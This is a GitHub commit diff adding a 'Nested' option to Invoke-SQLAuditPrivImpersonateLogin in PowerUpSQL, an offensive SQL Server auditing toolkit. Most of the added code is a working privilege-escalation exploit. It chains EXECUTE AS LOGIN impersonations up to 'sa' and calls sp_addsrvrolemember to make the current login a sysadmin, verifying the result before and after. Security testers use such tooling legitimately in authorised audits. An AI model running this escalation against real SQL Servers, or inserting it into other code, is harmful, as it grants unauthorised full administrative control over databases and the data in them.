Skip to content

Commit 9923d9b

Browse files
nullbindnullbind
authored
Merge pull request #34 from D00MFist/master
Added Nested Flag to Invoke-SQLAuditPrivImpersonateLogin
2 parents a32b738 + 690b788 commit 9923d9b

File tree

1 file changed

+45
-1
lines changed

1 file changed

+45
-1
lines changed

PowerUpSQL.ps1

Lines changed: 45 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -22642,6 +22642,8 @@ Function Invoke-SQLAuditPrivImpersonateLogin
2264222642
Don't output anything.
2264322643
.PARAMETER Exploit
2264422644
Exploit vulnerable issues
22645+
.PARAMETER Nested
22646+
Exploit Nested Impersonation Capabilites
2264522647
.EXAMPLE
2264622648
PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123!
2264722649

@@ -22705,7 +22707,11 @@ Function Invoke-SQLAuditPrivImpersonateLogin
2270522707

2270622708
[Parameter(Mandatory = $false,
2270722709
HelpMessage = 'Exploit vulnerable issues.')]
22708-
[switch]$Exploit
22710+
[switch]$Exploit,
22711+
22712+
[Parameter(Mandatory = $false,
22713+
HelpMessage = 'Exploit Nested Impersonation Capabilites.')]
22714+
[switch]$Nested
2270922715
)
2271022716

2271122717
Begin
@@ -22857,6 +22863,44 @@ Function Invoke-SQLAuditPrivImpersonateLogin
2285722863
Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
2285822864
$Exploited = 'No'
2285922865
}
22866+
}
22867+
# ---------------------------------------------------------------
22868+
# Exploit Nested Impersonation Vulnerability
22869+
# ---------------------------------------------------------------
22870+
if($Nested)
22871+
{
22872+
# Status user
22873+
Write-Verbose -Message "$Instance : - EXPLOITING: Starting Nested Impersonation exploit process (under assumption to levels of nesting and 1st first can impersonate sa)..."
22874+
22875+
# Check if user is already a sysadmin
22876+
$SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
22877+
if($SysadminPreCheck -eq 0)
22878+
{
22879+
# Status user
22880+
Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin."
22881+
Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role..."
22882+
22883+
# Attempt to add the current login to sysadmins fixed server role
22884+
$null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'"
22885+
22886+
# Verify the login was added successfully
22887+
$SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
22888+
if($SysadminPostCheck -eq 1)
22889+
{
22890+
Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!"
22891+
$Exploited = 'Yes'
22892+
}
22893+
else
22894+
{
22895+
Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin."
22896+
}
22897+
}
22898+
else
22899+
{
22900+
# Status user
22901+
Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
22902+
$Exploited = 'No'
22903+
}
2286022904
}
2286122905
}
2286222906
else

0 commit comments

Comments
 (0)